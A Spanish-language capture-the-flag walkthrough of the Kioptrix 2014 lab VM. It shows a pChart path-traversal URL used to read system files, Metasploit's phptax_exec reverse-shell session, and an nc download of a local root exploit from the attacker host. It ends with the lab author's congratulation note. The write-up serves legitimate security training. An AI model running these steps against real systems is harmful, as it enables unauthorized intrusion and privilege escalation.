SOLUCION KIPTRIX 2014 propuesto en SEC-TRACK.COM BY #KAGUREZAMA Después de descargar el tar.bz2 procedo a comprobar el archivo antes de extraerlo así garantizamos que no se halla dañado o modificado en la descarga.
Una vez extraído para estos casos problemáticos en que no me salen las cosas en virtualbox tengo el VMware player que es por decirlo de alguna manera un reproductor de máquinas virtuales sin recurrir a la piratería que llaman porque no me puedo costear una licencia del Workstation o uno similar
La abro y miro las configuraciones doy play y listo inicia la máquina para la diversión.
Tuve que quitar la tarjeta de red y crear otra y la deje en modo puente porque me es más cómodo para mí. Aclaro que al comienzo tenia la ip 192.168.2.101 pero luego de un reinicio quedo la 192.168.2.104 Lanzo un nmap 192.168.2.1-254 que es el segmento donde está el lab para estos menesteres .
Solo tiene el puerto 80 abierto y el 8080 asi que todo esta encaminado a un reto web seg煤n parece. Esto aparece en los dos puertos al entrar con el navegador. Asi que para ver que sucede hago una petici贸n en raw con el netcat al 8080 y me contesta lo mismo el server, forbidden .
YA sabiendo que es un reto web le lanzo en nikto para intentar descubrir algo me de pistas por donde debo seguir as que primero voy por el puerto 80 y luego lo hare por el puerto 8080.
Pues no hay mucho ya que la supuesta vulnerabilidad en el mod ssl no es tal en esta versión sobre freebsd. En el 8080 paso algo muy raro pues lance el nikto –h 192.168.2.101 –port 8080 y la verdad demoro más de lo normal sin dar resultado alguno antes de aventurarme mas alla volvi a el puerto 80 donde está el texto It works! Y vi el código fuente de la web y esto fue lo que me apareció, esto es como el cuento de Hansel y Gretel dejan las migas y uno las sigue, ingreso a la url que esta comentada y me encuentro un bonito navegador de archivos <html> <head> <!-<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> --> </head> <body> <h1>It works!</h1> </body> </html>
Como se imaginaran lo primero que se me ocurrió después de ver esto fue buscar exploits para la aplicación BUSQUEDA exploits pchart2.1.3, dice el dicho si esta hay es por algo, en la búsqueda encontré este http://es.1337day.com/exploit/21805 que fue el que me sirvió intente como dice el exploit hacerme con los usuarios y su hash para haber si tenía acceso de esta forma pero no me fue posible, luego se me iluminó el foco e intente sacar la configuración del apache para ver por que no me dejaba ver nada en el puert 8080 pero después de mucho rato de frustración por no poder obtenerlo me acorde que esto no era un Linux si no un freebsd cosa que cambia las cosas. Busco en google BUSQUEDA losg apache freebsd por que losg y no conf por que mi idea incial era ver que estaba pasando con el apache pero vueltas da rápidamente la fuerza diría un viejo conocido jedi ,y esta web me ayudo http://www.codeasite.com/index.php/linux-a-apache/94how-do-i-find-apache-http-server-log-files Empieso a crear la consulta y obtengo por fin los siguiente http://192.168.2.101/pChart2.1.3/examples/?Action=View&Script=/../../../usr/local/etc/apache22 /httpd.conf he resaltado la configuracion que hay al final del archivo donde se especifica que solo si se viene con un user agent como el siguiente se puede ver el contenido Allow from env=Mozilla4_browser # # This is the main Apache HTTP server configuration file. It contains the # configuration directives that give the server its instructions. # See <URL:http://httpd.apache.org/docs/2.2> for detailed information. # In particular, see # <URL:http://httpd.apache.org/docs/2.2/mod/directives.html> # for a discussion of each configuration directive. #
# Do NOT simply read the instructions in here without understanding # what they do. They're here only as hints or reminders. If you are unsure # consult the online docs. You have been warned. # # Configuration and logfile names: If the filenames you specify for many # of the server's control files begin with "/" (or "drive:/" for Win32), the # server will use that explicit path. If the filenames do *not* begin # with "/", the value of ServerRoot is prepended -- so "/var/log/foo_log" # with ServerRoot set to "/usr/local" will be interpreted by the # server as "/usr/local//var/log/foo_log". # # ServerRoot: The top of the directory tree under which the server's # configuration, error, and log files are kept. # # Do not add a slash at the end of the directory path. If you point # ServerRoot at a non-local disk, be sure to point the LockFile directive # at a local disk. If you wish to share the same ServerRoot for multiple # httpd daemons, you will need to change at least LockFile and PidFile. # ServerRoot "/usr/local" # # Listen: Allows you to bind Apache to specific IP addresses and/or # ports, instead of the default. See also the <VirtualHost> # directive. # # Change this to Listen on specific IP addresses as shown below to # prevent Apache from glomming onto all bound IP addresses. # #Listen 12.34.56.78:80 Listen 80 Listen 8080 # # Dynamic Shared Object (DSO) Support # # To be able to use the functionality of a module which was built as a DSO you # have to place corresponding `LoadModule' lines at this location so the # directives contained in it are actually available _before_ they are used. # Statically compiled modules (those listed by `httpd -l') do not need # to be loaded here. # # Example: # LoadModule foo_module modules/mod_foo.so # LoadModule authn_file_module libexec/apache22/mod_authn_file.so LoadModule authn_dbm_module libexec/apache22/mod_authn_dbm.so LoadModule authn_anon_module libexec/apache22/mod_authn_anon.so
LoadModule authn_default_module libexec/apache22/mod_authn_default.so LoadModule authn_alias_module libexec/apache22/mod_authn_alias.so LoadModule authz_host_module libexec/apache22/mod_authz_host.so LoadModule authz_groupfile_module libexec/apache22/mod_authz_groupfile.so LoadModule authz_user_module libexec/apache22/mod_authz_user.so LoadModule authz_dbm_module libexec/apache22/mod_authz_dbm.so LoadModule authz_owner_module libexec/apache22/mod_authz_owner.so LoadModule authz_default_module libexec/apache22/mod_authz_default.so LoadModule auth_basic_module libexec/apache22/mod_auth_basic.so LoadModule auth_digest_module libexec/apache22/mod_auth_digest.so LoadModule file_cache_module libexec/apache22/mod_file_cache.so LoadModule cache_module libexec/apache22/mod_cache.so LoadModule disk_cache_module libexec/apache22/mod_disk_cache.so LoadModule dumpio_module libexec/apache22/mod_dumpio.so LoadModule reqtimeout_module libexec/apache22/mod_reqtimeout.so LoadModule include_module libexec/apache22/mod_include.so LoadModule filter_module libexec/apache22/mod_filter.so LoadModule charset_lite_module libexec/apache22/mod_charset_lite.so LoadModule deflate_module libexec/apache22/mod_deflate.so LoadModule log_config_module libexec/apache22/mod_log_config.so LoadModule logio_module libexec/apache22/mod_logio.so LoadModule env_module libexec/apache22/mod_env.so LoadModule mime_magic_module libexec/apache22/mod_mime_magic.so LoadModule cern_meta_module libexec/apache22/mod_cern_meta.so LoadModule expires_module libexec/apache22/mod_expires.so LoadModule headers_module libexec/apache22/mod_headers.so LoadModule usertrack_module libexec/apache22/mod_usertrack.so LoadModule unique_id_module libexec/apache22/mod_unique_id.so LoadModule setenvif_module libexec/apache22/mod_setenvif.so LoadModule version_module libexec/apache22/mod_version.so LoadModule ssl_module libexec/apache22/mod_ssl.so LoadModule mime_module libexec/apache22/mod_mime.so LoadModule dav_module libexec/apache22/mod_dav.so LoadModule status_module libexec/apache22/mod_status.so LoadModule autoindex_module libexec/apache22/mod_autoindex.so LoadModule asis_module libexec/apache22/mod_asis.so LoadModule info_module libexec/apache22/mod_info.so LoadModule cgi_module libexec/apache22/mod_cgi.so LoadModule dav_fs_module libexec/apache22/mod_dav_fs.so LoadModule vhost_alias_module libexec/apache22/mod_vhost_alias.so LoadModule negotiation_module libexec/apache22/mod_negotiation.so LoadModule dir_module libexec/apache22/mod_dir.so LoadModule imagemap_module libexec/apache22/mod_imagemap.so LoadModule actions_module libexec/apache22/mod_actions.so LoadModule speling_module libexec/apache22/mod_speling.so LoadModule userdir_module libexec/apache22/mod_userdir.so LoadModule alias_module libexec/apache22/mod_alias.so LoadModule rewrite_module libexec/apache22/mod_rewrite.so
LoadModule php5_module
libexec/apache22/libphp5.so
<IfModule !mpm_netware_module> <IfModule !mpm_winnt_module> # # If you wish httpd to run as a different user or group, you must run # httpd as root initially and it will switch. # # User/Group: The name (or #number) of the user/group to run httpd as. # It is usually good practice to create a dedicated user and group for # running httpd, as with most system services. # User www Group www </IfModule> </IfModule> # 'Main' server configuration # # The directives in this section set up the values used by the 'main' # server, which responds to any requests that aren't handled by a # <VirtualHost> definition. These values also provide defaults for # any <VirtualHost> containers you may define later in the file. # # All of these directives may appear inside <VirtualHost> containers, # in which case these default settings will be overridden for the # virtual host being defined. # # # ServerAdmin: Your address, where problems with the server should be # e-mailed. This address appears on some server-generated pages, such # as error documents. e.g. admin@your-domain.com # ServerAdmin you@example.com # # ServerName gives the name and port that the server uses to identify itself. # This can often be determined automatically, but we recommend you specify # it explicitly to prevent problems during startup. # # If your host doesn't have a registered DNS name, enter its IP address here. # #ServerName www.example.com:80 # # DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but # symbolic links and aliases may be used to point to other locations. # DocumentRoot "/usr/local/www/apache22/data" # # Each directory to which Apache has access can be configured with respect # to which services and features are allowed and/or disabled in that # directory (and its subdirectories). # # First, we configure the "default" to be a very restrictive set of # features. # <Directory /> AllowOverride None Order deny,allow Deny from all </Directory> # # Note that from this point forward you must specifically allow # particular features to be enabled - so if something's not working as # you might expect, make sure that you have specifically enabled it # below. # # # This should be changed to whatever you set DocumentRoot to. # <Directory "/usr/local/www/apache22/data"> # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both complicated and important. Please see # http://httpd.apache.org/docs/2.2/mod/core.html#options # for more information. # Options Indexes FollowSymLinks # # AllowOverride controls what directives may be placed in .htaccess files. # It can be "All", "None", or any combination of the keywords: # Options FileInfo AuthConfig Limit
# AllowOverride None # # Controls who can get stuff from this server. # Order allow,deny Allow from all </Directory> # # DirectoryIndex: sets the file that Apache will serve if a directory # is requested. # <IfModule dir_module> DirectoryIndex index.php index.html </IfModule> # # The following lines prevent .htaccess and .htpasswd files from being # viewed by Web clients. # <FilesMatch "^\.ht"> Order allow,deny Deny from all Satisfy All </FilesMatch> # # ErrorLog: The location of the error log file. # If you do not specify an ErrorLog directive within a <VirtualHost> # container, error messages relating to that virtual host will be # logged here. If you *do* define an error logfile for a <VirtualHost> # container, that host's errors will be logged there and not here. # ErrorLog "/var/log/httpd-error.log" # # LogLevel: Control the number of messages logged to the error_log. # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. # LogLevel warn <IfModule log_config_module> # # The following directives define some format nicknames for use with
# a CustomLog directive (see below). # LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %b" common <IfModule logio_module> # You need to enable mod_logio.c to use %I and %O LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio </IfModule> # # The location and format of the access logfile (Common Logfile Format). # If you do not define any access logfiles within a <VirtualHost> # container, they will be logged here. Contrariwise, if you *do* # define per-<VirtualHost> access logfiles, transactions will be # logged therein and *not* in this file. # #CustomLog "/var/log/httpd-access.log" common # # If you prefer a logfile with access, agent, and referer information # (Combined Logfile Format) you can use the following directive. # CustomLog "/var/log/httpd-access.log" combined </IfModule> <IfModule alias_module> # # Redirect: Allows you to tell clients about documents that used to # exist in your server's namespace, but do not anymore. The client # will make a new request for the document at its new location. # Example: # Redirect permanent /foo http://www.example.com/bar # # Alias: Maps web paths into filesystem paths and is used to # access content that does not live under the DocumentRoot. # Example: # Alias /webpath /full/filesystem/path # # If you include a trailing / on /webpath then the server will # require it to be present in the URL. You will also likely # need to provide a <Directory> section to allow access to # the filesystem path. # # ScriptAlias: This controls which directories contain server scripts.
# ScriptAliases are essentially the same as Aliases, except that # documents in the target directory are treated as applications and # run by the server when requested rather than as documents sent to the # client. The same rules about trailing "/" apply to ScriptAlias # directives as to Alias. # ScriptAlias /cgi-bin/ "/usr/local/www/apache22/cgi-bin/" </IfModule> <IfModule cgid_module> # # ScriptSock: On threaded servers, designate the path to the UNIX # socket used to communicate with the CGI daemon of mod_cgid. # #Scriptsock /var/run/cgisock </IfModule> # # "/usr/local/www/apache22/cgi-bin" should be changed to whatever your ScriptAliased # CGI directory exists, if you have that configured. # <Directory "/usr/local/www/apache22/cgi-bin"> AllowOverride None Options None Order allow,deny Allow from all </Directory> # # DefaultType: the default MIME type the server will use for a document # if it cannot otherwise determine one, such as from filename extensions. # If your server contains mostly text or HTML documents, "text/plain" is # a good value. If most of your content is binary, such as applications # or images, you may want to use "application/octet-stream" instead to # keep browsers from trying to display binary files as though they are # text. # DefaultType text/plain <IfModule mime_module> # # TypesConfig points to the file containing the list of mappings from # filename extension to MIME-type. # TypesConfig etc/apache22/mime.types #
# AddType allows you to add to or override the MIME configuration # file specified in TypesConfig for specific file types. # #AddType application/x-gzip .tgz # # AddEncoding allows you to have certain browsers uncompress # information on the fly. Note: Not all browsers support this. # #AddEncoding x-compress .Z #AddEncoding x-gzip .gz .tgz # # If the AddEncoding directives above are commented-out, then you # probably should define those extensions to indicate media types: # AddType application/x-compress .Z AddType application/x-gzip .gz .tgz # # AddHandler allows you to map certain file extensions to "handlers": # actions unrelated to filetype. These can be either built into the server # or added with the Action directive (see below) # # To use CGI scripts outside of ScriptAliased directories: # (You will also need to add "ExecCGI" to the "Options" directive.) # #AddHandler cgi-script .cgi # For type maps (negotiated resources): #AddHandler type-map var # # Filters allow you to process content before it is sent to the client. # # To parse .shtml files for server-side includes (SSI): # (You will also need to add "Includes" to the "Options" directive.) # #AddType text/html .shtml #AddOutputFilter INCLUDES .shtml AddType application/x-httpd-php .php AddType application/x-httpd-php-source .phps </IfModule> # # The mod_mime_magic module allows the server to use various hints from the # contents of the file itself to determine its type. The MIMEMagicFile # directive tells the module where the hint definitions are located.
# #MIMEMagicFile etc/apache22/magic # # Customizable error responses come in three flavors: # 1) plain text 2) local redirects 3) external redirects # # Some examples: #ErrorDocument 500 "The server made a boo boo." #ErrorDocument 404 /missing.html #ErrorDocument 404 "/cgi-bin/missing_handler.pl" #ErrorDocument 402 http://www.example.com/subscription_info.html # # # MaxRanges: Maximum number of Ranges in a request before # returning the entire resource, or 0 for unlimited # Default setting is to accept 200 Ranges #MaxRanges 0 # # EnableMMAP and EnableSendfile: On systems that support it, # memory-mapping or the sendfile syscall is used to deliver # files. This usually improves server performance, but must # be turned off when serving from networked-mounted # filesystems or if support for these functions is otherwise # broken on your system. # #EnableMMAP off #EnableSendfile off # Supplemental configuration # # The configuration files in the etc/apache22/extra/ directory can be # included to add extra features or to modify the default configuration of # the server, or you may simply copy their contents here and change as # necessary. # Server-pool management (MPM specific) #Include etc/apache22/extra/httpd-mpm.conf # Multi-language error messages #Include etc/apache22/extra/httpd-multilang-errordoc.conf # Fancy directory listings #Include etc/apache22/extra/httpd-autoindex.conf # Language settings
#Include etc/apache22/extra/httpd-languages.conf # User home directories #Include etc/apache22/extra/httpd-userdir.conf # Real-time info on requests and configuration #Include etc/apache22/extra/httpd-info.conf # Virtual hosts #Include etc/apache22/extra/httpd-vhosts.conf # Local access to the Apache HTTP Server Manual #Include etc/apache22/extra/httpd-manual.conf # Distributed authoring and versioning (WebDAV) #Include etc/apache22/extra/httpd-dav.conf # Various default settings #Include etc/apache22/extra/httpd-default.conf # Secure (SSL/TLS) connections #Include etc/apache22/extra/httpd-ssl.conf # # Note: The following must must be present to support # starting without SSL on platforms with no /dev/random equivalent # but a statically compiled-in mod_ssl. # <IfModule ssl_module> SSLRandomSeed startup builtin SSLRandomSeed connect builtin </IfModule> SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser <VirtualHost *:8080> DocumentRoot /usr/local/www/apache22/data2 <Directory "/usr/local/www/apache22/data2"> Options Indexes FollowSymLinks AllowOverride All Order allow,deny Allow from env=Mozilla4_browser </Directory>
</VirtualHost>
Include etc/apache22/Includes/*.conf Ya sabiendo que se necesita un user agent especial para entrar en el puerto 8080 entro desde el navegador ya habiendo cambiado el user agent con la extensión User Agent Switcher en iceweasel un fork del Firefox coloco el user agent que está en el archivo de configuración de apache sacado con la vulnerabilidad de pchart que permite acceder a archivos del sistema (The traversal is executed with the web server's privilege and leads tosensitive file disclosure (passwd, siteconf.inc.php or similar),access to source codes, hardcoded passwords or other high impactconsequences, depending on the web server's configuration.This problem may exists in the production code if the example code wascopied into the production environment.) y funciona de maravillas claro que si alguien necesita casi todos lo user agents
existentes aquí una lista compatible con la extensión http://techpatterns.com/forums/about304.html Quedando el user agente asi
Ingreso a http://192.168.2.101:8080/ y me encuentro un bonito index of.
Doy click en phptax y me encuentro con otra aplicación web.
Y en entro en un loop de nuevo a buscar un exploit para la aplicación si existe en caso tal que o a buscarle el quiebre por mi mismo, pero se supone que dejan las aplicacoines que son vulnerables (“solo en retos generalmente”) asi que a buscar entro en exploit-db.com y tras una búsqueda encuentro tres exploits http://www.exploitdb.com/search/?action=search&filter_page=1&filter_description=phptax&filter_exploit_te xt=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter _osvdb=&filter_cve=
Hay tres de los cuales solo me sirvió el último. Pero para facilitarme la vida hice la misma búsqueda en el metasploit ya que si esta en exploit-db es probable que este incluido en el metasploit que viene con el kali Linux primero abro el metasploit con
Espero… y oooo! grata sorpresa veo que si hay algo y por ende puede ahorrarnos bastante trabajo.
Aquí le doy las opciones y exploto Exploit target: Id Name -- ---0 PhpTax 0.8
msf exploit(phptax_exec) > set RHOST 192.168.2.101 RHOST => 192.168.2.101 msf exploit(phptax_exec) > set RPORT 8080 RPORT => 8080
msf exploit(phptax_exec) > set TARGETURI /phptax/ TARGETURI => /phptax/ msf exploit(phptax_exec) > exploit [*] Started reverse double handler [*] 192.168.2.1018080 - Sending request... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo COI4EJBmKDBPQWpz; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "COI4EJBmKDBPQWpz\r\n" [*] Matching... [*] A is input... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo iilQukosvYD6jxe6; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "iilQukosvYD6jxe6\r\n" [*] Command shell session 1 opened (192.168.2.104:4444 -> 192.168.2.101:58131) at 2014-04-14 00:23:49 -0500 Primero hago un ls a ver que hay en el directorio donde estoy luego un uname –a para saber que versión de freebsd es. ls data drawimage.php files icons.inc index.php maps pictures readme ttf uname -a FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 Lue un ls al directorio /root y veo lo que me interesa la bandera por decirlo de algún modo congrats.txt alverlo intento leerlo cat /root/congrats.txt y hasta ahí llega mi felicidad me un lindo y frustrante permiso denegado lo cual quiere decir que solo root tiene acceso a ese
archivo pero teniendo la versión del freebsd solo resta buscar algún exploit para ganar privilegios de root. ls /root congrats.txt folderMonitor.log httpd-access.log lazyClearLog.sh monitor.py ossec-alerts.log cat /root/congrats.txt cat: /root/congrats.txt: Permission denied Una vez más metasploit me mostro que si había uno disponible para versión nueve pero solo para ejecución local y vino mi problema porque no tenía forma de bajar nada al servidor no podía ejecutar cosas básicas como wget curl ni php ni python ni nano ni vi, asi que por ser local debía arreglármelas para subir lo que necesito el código del exploit para compilarlo y ejecutarlo.
Se me ocurrio que si corria apps hechas en php podr铆a hacer un uploader y listo asi que hice mi primera prueba que fue el cl谩sico hola hola.php fui al navegador puse la dir y siiiiiiii!!!
Asi que como no soy muy diestro en php me copie el c贸digo de esta web http://www.w3schools.com/php/php_file_upload.asp con el c贸digo tuve problemas con la etiqueta <br > entonces solo la quite y me dejo crear el archivo upload_file.php
Pero después de mucho probar esta solución no me quiso andar asi que la deje aquí como mera anécdota.
Y volvi al origen intentar pasar mi exploit descargado de aquí http://www.exploitdb.com/exploits/26368/ a la maquina remota osea al target para poder rootearla (ganar acceso con privilegios del dios alias root) entre todo lo único que jamas se me había ocurrido probar era el netcat pero grata fue mi sorpresa cuando al poner nc me arroja esto.
Así que se me ocurrió descargar mi exploit desde netcat. En kali Linux es muy sencillo siguiendo el proceso con el mouse se pone en marcha el apache.
Renombre mí el exploit descargado a root.c y lo coloque en /var/www/root.c en la maquina kali ósea “la del atacante” y luego desde el target ejecute el siguiente comando nc 192.168.105 80 >root.c e hice una petición GET /root.c HTTP/1.0 doble enter
Enseguida hice un cat root.c y había pasado, solo que con un pequeño error me agrego las cabeceras http al exploit en c y por ende no me lo iba a dejar compilar pero pues nada que no se pueda sortear en sistemas *nix solo me hizo falta hacer un tail –n 89 root.c >final.c y quedo listo para compilar
Aquí solo fue compilar el exploit y ejecutarlo la opción gcc final.c –o root
Con el comando id veo que ya no soy el usuario www si no que ahora soy root y vuelvo a intentar leer el mensaje que se halla en la carpeta home del usuario y SIIIIIIIIIIIIIIIIIIIIIIIIII!!! Lo he logrado!!! Adjunto el contenido del archivo congrats.txt
If you are reading this, it means you got root (or cheated). Congratulations either way... Hope you enjoyed this new VM of mine. As always, they are made for the beginner in mind, and not meant for the seasoned pentester. However this does not mean one can't enjoy them. As with all my VMs, besides getting "root" on the system, the goal is to also learn the basics skills needed to compromise a system. Most importantly, in my mind, are information gathering & research. Anyone can throw massive amounts of exploits and "hope" it works, but think about the traffic.. the logs... Best to take it slow, and read up on the information you gathered and hopefully craft better more targetted attacks. For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly. Knowing the OS gives you any idea of what will work and what won't from the get go. Default file locations are not the same on FreeBSD versus a Linux based distribution. Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log". It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data". Finding and knowing these little details will greatly help during an attack. Of course my examples are specific for this target, but the theory applies to all systems. As a small exercise, look at the logs and see how much noise you generated. Of course the log results may not be accurate if you created a snapshot and reverted, but at
least it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things. Default settings, nothing fancy but it should've logged a few of your attacks. Look at the following files: /root/folderMonitor.log /root/httpd-access.log (softlink) /root/ossec-alerts.log (softlink) The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS for this. The httpd-access.log is rather self-explanatory . Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain files. This one should've detected a few of your web attacks. Feel free to explore the system and other log files to see how noisy, or silent, you were. And again, thank you for taking the time to download and play. Sincerely hope you enjoyed yourself. Be good...
loneferret http://www.kioptrix.com
p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've blocked your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to remove that part :) Como reflexión decir que no dejen de insistir en sus planes de aprendizaje con este tipo de retos que enseñanzas dejan siempre asi como dolores de cabeza que un dia te pueden servir. Gracias por leer y me perdonaran las faltas ortográficas y demás errores que puedan haber en el documento.